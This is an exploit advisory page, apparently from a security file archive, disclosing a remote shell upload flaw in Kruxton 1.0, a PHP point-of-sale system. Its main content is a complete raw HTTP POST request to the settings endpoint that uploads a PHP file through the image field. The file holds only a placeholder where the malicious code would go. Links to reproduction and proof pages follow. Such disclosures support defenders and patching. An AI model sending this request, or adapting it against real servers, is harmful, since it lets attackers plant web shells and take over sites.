Kruxton 1.0 Shell Upload

Kruxton 1.0 Shell Upload: Posted Apr 15, 2024; Authored by nu11secur1ty; Kruxton version 1.0 suffers from a remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | eac82a8882065fad4041f5e76566b23a349a9bac77c6028731f1d06a43bc4ca4; Download | Favorite | View

Kruxton 1.0 Shell Upload

## Title: kruxton-1.0-FileUpload-RCE
## Author: nu11secur1ty
## Date: 04/15/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
## Reference: https://portswigger.net/web-security/file-upload

## Description:
The system setting with parameter IMG is vulnerable to File Upload
vulnerability.
The attacker can upload a very malicious PHP file into the server and
then he can execute it
This is a potential CRITICAL PROBLEM!

STATUS: HIGH- Vulnerability

[+]Payload:
```POST
POST /kruxton/ajax.php?action=save_settings HTTP/1.1
Host: localpwnedhost.com
Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq;
PHPSESSID=lp21rf44drtnogjboa8v7lpmg1
Content-Length: 1043
Sec-Ch-Ua: "Chromium";v="123", "Not:A-Brand";v="8"
Accept: */*
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryUwsdkjlNQ5exBwrq
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88
Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://localpwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localpwnedhost.com/kruxton/index.php?page=site_settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close

------WebKitFormBoundaryUwsdkjlNQ5exBwrq
Content-Disposition: form-data; name="name"

Kruxton Bristo By Mayuri K
------WebKitFormBoundaryUwsdkjlNQ5exBwrq
Content-Disposition: form-data; name="email"
mayuri.infospace@gmail.com
------WebKitFormBoundaryUwsdkjlNQ5exBwrq
Content-Disposition: form-data; name="contact"

9000000000
------WebKitFormBoundaryUwsdkjlNQ5exBwrq
Content-Disposition: form-data; name="about"

<p>Kruxton Bristo By Mayuri K</p><p data-f-id="pbf" style="text-align:
center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family:
sans-serif;">Powered by <a
href="https://www.froala.com/wysiwyg-editor?pb=1" title="Froala
Editor">Froala Editor</a></p>
------WebKitFormBoundaryUwsdkjlNQ5exBwrq
Content-Disposition: form-data; name="img"; filename="1nsi1deyou.php"
Content-Type: application/octet-stream

<?php
// by nu11secur1ty - 2024
//Your malicious code here
?>

------WebKitFormBoundaryUwsdkjlNQ5exBwrq--
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-fileupload-rce.html)

## Time spent:
00:15:00

Top Authors In Last 30 Days

Red Hat 212 files
Ubuntu 60 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 10 files
nu11secur1ty 7 files
Milad Karimi 6 files
Google Security Research 6 files
Jann Horn 4 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,024)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,363)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,594)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,472)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Kruxton 1.0 Shell Upload

Kruxton 1.0 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Kruxton 1.0 Shell Upload

Share This

Kruxton 1.0 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems